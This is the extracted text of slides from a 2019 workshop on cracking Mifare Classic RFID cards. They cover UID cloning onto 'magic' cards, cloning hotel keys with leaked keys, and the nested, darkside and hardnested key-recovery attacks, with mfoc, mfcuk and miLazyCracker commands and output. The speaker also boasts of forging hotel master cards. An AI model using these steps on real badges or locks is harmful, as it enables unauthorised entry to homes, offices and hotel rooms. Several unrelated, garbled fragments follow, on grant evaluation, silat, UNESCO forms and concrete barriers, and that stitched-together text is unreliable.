Cracking Mifare Classic On The Cheap Workshop - Smart Lock Picking
Sławomir racking Mifare Classic onthe cheapWorkshopHackInParis, 19-20.06.2019
Sławomir suavomeer Jasek yaseck Enjoy appsec (dev, break, build.) since2003.„Smart lockpicking” trainingswww.smartlockpicking.comSignificant part of time for research.
How much can we fit in 45 min?Mifare Classic – intro, hardware neededCard UID, cloning access control badge using phoneMifare Classic dataAttacks and required hardware- brute leaked keys, clone hotel key- „nested”, „darkside”, „hardnested” attacks
Card types, frequencies, .125 kHz („low frequency”)RFID13.56MHz („high frequency”)NFC868MHz (UHF),othercovered todayEM4XX (Unique), HID Prox,Indala, Honeywell, AWID, .Mifare/DESFire, iCLASS, Legic,Calypso, contactless payments, .Vehicle id,asset tracking.
Mifare ClassicThe MIFARE Classic family is the most widely usedcontactless smart card ICs operating in the 13.56 MHzfrequency range with read/write ds/2015/03/MIFARE Classic EV1.pdfCity cards, access control, student id, memberships, internalpayment, tourist card, ski pass, hotels, .
Some of Mifare Classic hacking toolsFeatures vs PriceProxmark 350- 300 EUR5- 40 EUR - NXP PN532 - Android smartphoneFree mobile app
What you will need?Mifare Classic – introCard UID, usage in access control, cloningMifare Classic data – introAttacks and required hardware- brute leaked keys- „nested”, „darkside”, „hardnested” attacksPossible ashomework
What I brought hereYou can easily getit yourself - e.g.Aliexpress fromChina, or somelocal distributors.Note: the qualitymay vary.
What is stored on the card?UID – individual, read only, not protectedData – stored in sectors, protected byaccess keysUIDDATA
The simplest access control systemsCheck just for individual ID 3-10 bytes (most commonly 4). Read-only Freely accessible to read Reader checks for registered ID.UID valid?UID
The UIDSecurity: UID is set in factory andcannot be altered. Only vendorknows how to make a tag – by laserfusing of poly silicon links.Guess what happened next?
„Magic UID” or „UID-changeable” cardsAllow to change the UIDVarious generations gen 1 – requires special hardware(e.g PN532) gen 2 – possible to write usingmobile phoneUID„MAGICUID”ANY UID
EXERCISE #1- Clone Mifare UID using mobile phone
Our access control cardQuite common setupfor apartments, gates,parkings, offices, .
Clone the access control card using AndroidMifare Classic Tool by @iiiikarusFree, ils?id de.syss.MifareClassicToolNote: some phones are not icTool/blob/master/INCOMPATIBLE DEVICES.md
Read UID using mobile phoneTools - Display tag infoAlso: displays UID when new tagdetectedTools - Display tag info
Write UID using smartphone?Standard cards UID is read-only.You need „direct write” (Gen 2) UID-changeable card.For example my business card https://smartlockpicking.com/card
Swipe the originalcard by the phone
Original UIDIt worked!Swipe the „magic”card by the phone
Now try the cloned card at the reader!Video: https://www.youtube.com/watch?v btLQB8WCQXA
BTW, it also works for hotelsReader by the door (notembedded in the lock) –checks the UID 171280478208
EXERCISE #2- Mifare Classic data
What is stored on the card?UID – individual, read only, not protectedData – stored in sectors, protected byaccess keysUIDDATA
Try reading the content of access control card„std.keys” (default keys)The dumpedcontent (blank, 0’s)
Mifare classic data structureSector 0Block 0MF Classic 1K: 16 sectors, each has4 16-byte blocksEach sector has 2 different keys: A – e.g. for reading B – e.g. for writing stored in last block of sector,along with access rightsBlock 1Block 2KeyA access rights KeyBSector 1Block 4Block 5Block 6KeyA access rights KeyB
The access control (blank) card contentManufacturer block(read only)Card UIDData (blank, 0’s)Key A(default)Access conditionsKey B(default)
Now try with hotel keyThis tag unlocks our hotel door lock
Try to dump the hotel tagNo, standard keys didnot work for sector 0
Leaked keys database
Our key was inthe leaked dbHotelaccess data
Clone the card?
Write dataIn our caseonly sector 0has data
Now try the cloned card at the readerYes, it works in so many hotels.
Wipe the „magic” card again!
The hotel key data – sector 0Hotel key data
Hotel key dataI checked in Friday, 14.06.2019 and stay till next Saturday
Hotel key dataI checked in Friday, 14.06.2019 and stay till next SaturdayCheck in: 2019.06.14,9:26Check out: 2019.06.2212:30
„Master” card that unlocks all the doors?Having just a guest card for anyhotel using this system, I can create„master” card in 1 min (in mostcases using just a phone).I’m sorry I can’t tell you how to do it– it looks like the vendor will notpatch ;)
4-star hotel – unlock all the doors like a boss (video)
My hotel in Paris recently, same system
Mifare Classic cracking processTry default, leakedh keysFew secondsHave allkeys?YESHOORAY!
EXERCISE #3- Cracking access keys using „nested” attack
For the next challenge.Hotel has set a different,individual key.Take the next card fromthe set and try to read it.
Keys not leaked?Nope, it does not work.The keys are not leaked.Brute all the possible values? Too much time.There are several other attacks possible!
Mifare Classic cracking processTry default, leakedh keysHave allkeys?YESFew secondsNO?HOORAY!
Mifare Classic cracking processTry default, leakedh keysHave allkeys?YESFew secondsNOHave atleast onekey?YESnestedHOORAY!
What if we could not brute the key?„Nested” attack - exploits weakness inRNG and auth to other sector based onprevious auth.Required at least one key to any sector.Technical details:http://www.cs.ru.nl/ r 0Key: FFFFFFFFSector 1Key: unknownSector 2Key: unknownSector 3Key: unknownSector 4Key: unknown.
How to exploit it?Not possible using smartphone, some nonstandard communication required.PN532 libnfc MFOC by Nethembahttps://github.com/nfc-tools/mfocKali Linux: installed by default.
How to connect our PN532 board?
Connect to Linux, check your device recognizedroot@kali: # 09][301928.142996]usb 1-1.3: Product: USB-Serial Controllerusb 1-1.3: Manufacturer: Prolific Technology Inc.pl2303 1-1.3:1.0: pl2303 converter detectedusb 1-1.3: pl2303 converter now attached to ttyUSB0
Edit /etc/nfc/libnfc.conf config fileUncomment (at the end of file):device.connstring "pn532 uart:/dev/ttyUSB0"
Check if it works correctlyroot@kali: # nfc-listnfc-list uses libnfc 1.7.1NFC device: pn532 uart:/dev/ttyS0 openedOK
Troubleshooting: communication errorroot@kali: # nfc-listnfc-list uses libnfc 1.7.1error libnfc.driver.pn532 uart pn53x check communication errornfc-list: ERROR: Unable to open NFC device: pn532 uart:/dev/ttyS0Check your wiring
MFOC toolOutput dump fileroot@kali: # mfoc -O hotel.mfdThe tool will:1. Check if any sector’s key is default/publicly known2. Leverage one known key to brute others using „nested”attack
Try default keys
Default keys foundKeys to sector 0 missing
Few minutes later – found remaining keys
Using proxmark?5 seconds(about 2s/key)
You can now add the cracked keys to MCTCreate newOr edit existingFrom now you can read thecard content with a phone
Mifare Classic cracking processTry default, leakedh keysFew secondsHave atleast onekey?NOHave allkeys?YESYESnestedfew secfew minHOORAY!
Mifare Classic cracking processTry default, leakedh keysFew secondsHave atleast onekey?NOHave allkeys?YESYESnestedfew secfew minNO?HOORAY!
But what if all the keys are unknown?„Darkside” attack, Nicolas T. Courtois – sidechannel. Tech : MFCUK by Andrei Costinhttps://github.com/nfc-tools/mfcukPN532 may take 30 minutes for one key.Having one key - proceed with „nested”.Sector 0Key: unknownSector 1Key: unknownSector 2Key: unknownSector 3Key: unknownSector 4Key: unknown.
Libnfc implementation: MFCUKhttps://github.com/nfc-tools/mfcukSleep options, necessary forour hardware# mfcuk -C -R 0:A -s 250 -S 250 -v 3Recover Key Asector 0Verbosity, so we can seeprogress
Mifare Classic cracking processTry default, leakedh keys30 secFew secondsHave atleast onekey?NOHave allkeys?YESYESnestedfew sec30-60 minfew minNOdarksidecracked 1 keyHOORAY!
MIFARE CLASSIC EV1
Mifare Classic EV1 („hardened”)The „nested” and „darkside” attacks exploit implementationflaws (PRNG, side channel, .).Mifare Classic EV1, Plus in Classic mode (SL1) – fixes theexploit vectors.Your example card „Mifare Classic EV1” with guest hotelcard content.
Hardnested libnfc„Hardnested” attack – exploits CRYPTO1 weakness. Tech details:http://cs.ru.nl/ rverdult/Ciphertextonly Cryptanalysis on Hardened Mifare Classic Cards-CCS 2015.pdfPN532 libnfc: miLazyCracker - automatically detects card type,proceeds with relevant attack rhttps://www.youtube.com/watch?v VcU3Yf5AqQI
miLazyCracker – installationroot@kali: # git clone : # cd miLazyCracker/root@kali: /miLazyCracker# ./miLazyCrackerFreshInstall.shRecently may not build out of the box(missing dependencies)
miLazyCracker – installation troubleshootingThe installation depends on external sources that are notofficially available any more.
miLazyCracker vs Mifare Classic EV1root@kali: # miLazyCracker(.)Card is not vulnerable to nested attackMFOC not possible, detected hardened Mifare ClassicTrying HardNested Attack.libnfc crypto1 crack ffffffffffff 60 B 8 A mfc de7d61c0 foundKeys.txt(.)Found key: 1ab2[.]
Mifare Classic hardened (Plus SL1, EV1) crackingTry default, leakedh keysHave allkeys?Few secondsNOHave atleast onekey?YESYEShardnestedSeveral minHOORAY!
Mifare Classic hardened (Plus SL1, EV1) crackingTry default, leakedh keysHave allkeys?Few secondsNOHave atleast onekey?YESYEShardnestedSeveral minNO?HOORAY!
EV1 with all sectors secured?„Hardnested” requires at least one known key.What if all the keys are unknown?Recover the key using online attack (mfkey) –requires to emulate/sniff the card to a valid reader.Hardware: Proxmark, Chameleon Mini RevE„Rebooted” (starting 30), .
Mifare Classic hardened (Plus SL1, EV1) crackingTry default, leakedh keysHave allkeys?Trip to the readerFew secondsNOHave atleast onekey?NOReader attackYESYEShardnestedSeveral minHOORAY!
Final NXP recommendation to upgrade (2015.10)NXP is recommending that existing MIFARE Classic systemsare upgraded (e.g. to DESFire). Furthermore, NXP does notrecommend to design in MIFARE Classic in any securityrelevant pto1-implementations/
WANT TO LEARNMORE?
Want to learn more?A 2018 practical guide to hacking nfidence A 2018 Practical Guide To Hacking RFID NFC.pdfhttps://www.youtube.com/watch?v 7GFhgv5jfZk
Want to learn more?TrainingsTutorialsEvents.Don’t forget to subscribe fornewsletter https://www.smartlockpicking.com
Cracking Mifare Classic on the cheap Workshop Sławomir Jasek slawomir.jasek@smartlockpicking.com @slawekja HackInParis, 19-20.06.2019
May 02, 2018 · D. Program Evaluation ͟The organization has provided a description of the framework for how each program will be evaluated. The framework should include all the elements below: ͟The evaluation methods are cost-effective for the organization ͟Quantitative and qualitative data is being collected (at Basics tier, data collection must have begun)
Silat is a combative art of self-defense and survival rooted from Matay archipelago. It was traced at thé early of Langkasuka Kingdom (2nd century CE) till thé reign of Melaka (Malaysia) Sultanate era (13th century). Silat has now evolved to become part of social culture and tradition with thé appearance of a fine physical and spiritual .
the 3DES key, the MIFARE Ultralight C design shows some differences compared to MIFARE Ultralight design. In order to minimize the impact of chip differences for the customer designs and ease the transition from existing MIFARE Ultralight systems to MIFARE Ultralight C systems, this document highlights the differences between the two products.
On an exceptional basis, Member States may request UNESCO to provide thé candidates with access to thé platform so they can complète thé form by themselves. Thèse requests must be addressed to esd rize unesco. or by 15 A ril 2021 UNESCO will provide thé nomineewith accessto thé platform via their émail address.
̶The leading indicator of employee engagement is based on the quality of the relationship between employee and supervisor Empower your managers! ̶Help them understand the impact on the organization ̶Share important changes, plan options, tasks, and deadlines ̶Provide key messages and talking points ̶Prepare them to answer employee questions
Dr. Sunita Bharatwal** Dr. Pawan Garga*** Abstract Customer satisfaction is derived from thè functionalities and values, a product or Service can provide. The current study aims to segregate thè dimensions of ordine Service quality and gather insights on its impact on web shopping. The trends of purchases have
MIFARE SAM AV3 - Quick start up guide Rev. 1.4 — 15 June 2020 Application note 521014 COMPANY PUBLIC Document information Information Content Keywords MIFARE SAM AV3, Secure Key Storage, DES, TDEA, AES, RSA. Key Usage Counters. Abstract This application note introduces MIFARE SAM AV3 with some start up guidance.
measured by ASTM test method C 173 or C 231. Dimensions – Unless otherwise specified, the minimum length of each barrier section will be 10 feet. It is common for DOTs to ask for lengths of 20 feet or even 30 feet. ASTM C 825 Design Steel Reinforcement – Unless designated by the purchaser, reinforcement shall be designed by the producer and be sufficient to permit handling, delivery .
